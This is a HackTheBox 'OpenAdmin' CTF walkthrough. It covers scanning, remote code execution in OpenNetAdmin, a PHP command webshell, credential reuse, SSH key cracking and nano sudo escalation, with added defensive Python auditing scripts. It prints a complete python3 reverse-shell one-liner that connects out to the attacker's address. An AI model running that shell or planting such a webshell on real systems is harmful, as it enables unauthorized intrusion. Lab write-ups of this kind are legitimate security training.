CTF-Writeups/HackTheBox/OpenAdmin.md
2021-07-19 00:44:38 +05:00


HackTheBox-OpenAdmin

NMAP

nmap -p- -sC -sV --min-rate 5000 IP

PORT      STATE    SERVICE      REASON         VERSION
22/tcp    open     ssh          syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp    open     http         syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

PORT 80 (HTTP)

On the web server we only get the Apache default web page.

I tried to see if it had something in robots.txt, but that file didn't exist.

So I decided to run gobuster to fuzz for files and directories.

Going to the music directory we can see an HTML template page. There's a login link which takes us to an OpenNetAdmin page, an application for managing IP addresses, DNS, subnets, etc. It also exposes the version of OpenNetAdmin, which is 18.1.1.

On googling for exploits for version 18.1.1 we can see a GitHub repo with a PoC for remote code execution:

https://github.com/amriunix/ona-rce

We can check with the PoC whether the target is vulnerable or not.

But when running the exploit, it breaks.

So I went to exploit-db and tried that exploit.

And this one worked perfectly.

I tried getting a reverse shell again so that I could stabilize it, but it wasn't working.

I made a simple PHP file with a GET parameter named cmd that is passed to the system function (which runs a shell command and outputs the result), then hosted this file using python3 and downloaded it on the target machine using wget.

Using a python3 reverse shell I was able to get a proper shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Here I have just tried to stabilize the shell so we can clear the terminal screen and use the bash history with the up and down arrow keys.

We can go into the /home directory to see how many users there are.

There are 2 users, but we can't navigate into their folders as www-data doesn't have permission to view them. We can look for any running cronjobs with cat /etc/crontab.

Nothing there; next we can look for open ports.

Here we can see port 3306, which is the database. We can try to find the database password and see if it works for either one of the users.

In /opt/ona/www/local/config we can see a database settings file.
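The database settings file was readable by the www-data account, which is what made the password reuse on this box possible. As an added example (not part of this writeup or of OpenNetAdmin), the script below audits a config directory for files that are group- or world-readable and contain credential-looking settings; the directory, file names and contents it builds are constructed for the demo, and the list of secret-looking keys is an assumption you would extend for your own stack.

```python
"""Audit a web application's config directory for credential files that are
readable by accounts other than their owner (added example, constructed data)."""
import os
import re
import stat
import tempfile

# Heuristic: setting names that usually carry a secret (assumed starting list).
# Matches forms like  db_passwd' => '...',  secret = '...',  api_key: ...
SECRET_KEY_RE = re.compile(
    r"(passw(or)?d|secret|token|api_key)['\"]?\s*(=>|[=:])", re.IGNORECASE
)


def file_is_broadly_readable(path: str) -> bool:
    """True if the group or world read bit is set on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def find_exposed_secrets(root: str):
    """Return [(path, matching line)] for every broadly readable file under
    root that contains a credential-looking setting (one entry per line)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not file_is_broadly_readable(path):
                continue
            try:
                with open(path, "r", errors="replace") as fh:
                    for line in fh:
                        if SECRET_KEY_RE.search(line):
                            findings.append((path, line.strip()))
            except OSError:
                continue  # unreadable by us; nothing to report
    return findings


def build_demo_tree() -> str:
    """Construct a sample tree: a 0644 settings file holding a DB password
    (the pattern from this box) and a 0600 file that should not be flagged.
    File names and values are made up for the demo."""
    root = tempfile.mkdtemp(prefix="ona-audit-")
    exposed = os.path.join(root, "database_settings.inc.php")
    with open(exposed, "w") as fh:
        fh.write("<?php\n$ona_contexts = array('db_login' => 'ona_sys', "
                 "'db_passwd' => 'EXAMPLE_PASSWORD');\n")
    os.chmod(exposed, 0o644)
    locked = os.path.join(root, "private_settings.inc.php")
    with open(locked, "w") as fh:
        fh.write("<?php\n$secret = 'EXAMPLE_SECRET';\n")
    os.chmod(locked, 0o600)
    return root


if __name__ == "__main__":
    for path, line in find_exposed_secrets(build_demo_tree()):
        print(f"[!] {path}: {line}")
```

Run it against the real config directory of a deployment instead of the demo tree to list every settings file the web server user can hand to anyone who gets code execution as that user; the fix on the box side is 0640 with the file owned by the application account, plus not reusing the database password for a login account.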

Let's try this password on jimmy.

Perfect, this worked!

But sudo -l failed; the user was not allowed to use sudo, I guess. This user is in the internal group, so maybe there's some folder we can look into.

Looking into `index.php` we can see it's a login page which requires a username and password. There's a condition: if we provide the username as `jimmy` or provide the correct password, which we can recover from the SHA-512 hash; on cracking it, it is `Revealed`.
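Two things go wrong in the check as the writeup describes it: the username and the password are joined with OR, so knowing a username is enough, and the password is stored as a plain SHA-512 hash, which is fast and unsalted and therefore cheap to crack offline. The example below is added here in Python (it is not the box's PHP) and places that pattern next to a hardened one; the stored password `EXAMPLE_PASSWORD` and the PBKDF2 parameters are constructed for the demo.

```python
"""Login check as described for the internal index.php (OR, unsalted SHA-512)
next to a hardened version (AND, salted PBKDF2, constant-time compare).
Added example with constructed credentials, not code from the box."""
import hashlib
import hmac
import os

# --- vulnerable pattern --------------------------------------------------
VULN_USER = "jimmy"
VULN_HASH = hashlib.sha512(b"EXAMPLE_PASSWORD").hexdigest()  # unsalted, fast


def vulnerable_login(username: str, password: str) -> bool:
    """Accepts when the username alone matches OR the password hashes to the
    stored value; either half on its own opens the page."""
    return (username == VULN_USER
            or hashlib.sha512(password.encode()).hexdigest() == VULN_HASH)


# --- hardened pattern ----------------------------------------------------
PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to your hardware
DUMMY_SALT = b"\x00" * 16    # used for unknown users to keep timing uniform


def make_record(password: str) -> dict:
    """Store a per-user random salt and a slow PBKDF2-HMAC-SHA256 digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return {"salt": salt, "hash": digest}


USERS = {"jimmy": make_record("EXAMPLE_PASSWORD")}  # constructed user store


def hardened_login(username: str, password: str) -> bool:
    """Requires BOTH a known username AND the matching password, and always
    runs the KDF so a missing user is not detectable from response time."""
    record = USERS.get(username)
    salt = record["salt"] if record else DUMMY_SALT
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return record is not None and hmac.compare_digest(candidate, record["hash"])


if __name__ == "__main__":
    print("vulnerable, username only :", vulnerable_login("jimmy", "wrong"))
    print("hardened,   username only :", hardened_login("jimmy", "wrong"))
    print("hardened,   both correct  :", hardened_login("jimmy", "EXAMPLE_PASSWORD"))
```

The same two fixes translate directly to PHP: `&&` instead of `||`, and `password_hash`/`password_verify` instead of `hash('sha512', ...)` compared with `==`.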

We can also see a PHP file, main.php, which executes a shell command to read joanna's id_rsa key. If we try to run the PHP file ourselves we get a permission denied error, as it would be executed as jimmy.

If we look at the listening ports on the machine we can see port 52846.

Using curl we can make a request to that port, and it seems to be the same page that we saw in the internal directory, so this directory is being hosted on port 52846. This means we can navigate to the main.php file.

I saved the request to main.php in a text file and transferred that file to my machine.

On using the private key, it asks for a passphrase.

Using ssh2john we can get a hash of id_rsa and crack it to get the passphrase.

Now we have escalated to the second user; on running sudo -l we can see we have permission to run nano on /opt/priv.

We can check how to abuse nano on GTFOBins:

https://gtfobins.github.io/gtfobins/nano/
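A sudo rule that restricts nano to one file still hands over root, because the editor can launch a shell from inside. As an added example (not part of this writeup or of sudo), the script below parses sudoers-style user specifications and flags rules that grant editors or pagers with that capability, the kind of rule a defender would replace with `sudoedit` or a non-interactive tool. The sudoers text is constructed for the demo and the list of shell-capable binaries is a small assumed starting set to be extended from GTFOBins.

```python
"""Flag sudo rules that grant binaries able to spawn an interactive shell
(the nano-on-/opt/priv pattern). Added example; sample sudoers is constructed."""
import os
import re

# Assumed starting list of binaries that can drop to a shell from inside,
# even when sudo pins them to a single file argument.
SHELL_CAPABLE = {"nano", "vim", "vi", "view", "less", "more", "man"}

TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|"
                    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*")
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

SAMPLE_SUDOERS = """\
# constructed sample, not a real host's sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) /usr/bin/rsync -a /srv/data /mnt/backup
%admin  ALL=(ALL) /usr/bin/vim /etc/hosts, /usr/bin/systemctl restart apache2
"""


def parse_sudoers(text):
    """Yield (user, runas, nopasswd, command) for every command spec on a
    user-specification line; Defaults, aliases and comments are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"
        nopasswd = False
        for spec in m.group("rest").split(","):
            spec = spec.strip()
            # A tag applies to its own spec and to the ones that follow it.
            while True:
                tag = TAG_RE.match(spec)
                if not tag:
                    break
                if tag.group(1) == "NOPASSWD":
                    nopasswd = True
                elif tag.group(1) == "PASSWD":
                    nopasswd = False
                spec = spec[tag.end():]
            if spec:
                yield m.group("user"), runas, nopasswd, spec


def audit_sudoers(text):
    """Return one finding per command spec whose binary is shell-capable."""
    findings = []
    for user, runas, nopasswd, command in parse_sudoers(text):
        binary = os.path.basename(command.split()[0])
        if binary in SHELL_CAPABLE:
            findings.append({
                "user": user, "runas": runas, "binary": binary,
                "command": command, "nopasswd": nopasswd,
                "fix": f"{binary} can spawn a shell; use sudoedit or a "
                       f"non-interactive command for this task",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = " (NOPASSWD)" if f["nopasswd"] else ""
        print(f"[!] {f['user']} -> ({f['runas']}) {f['command']}{flag}: {f['fix']}")
```

The parser covers the plain `user host=(runas) [TAG:] command, command` form and ignores aliases, which is enough to pass a `sudo -l` style listing or a simple sudoers file through it; feed it the output of `visudo -c`-validated files rather than hand-edited fragments.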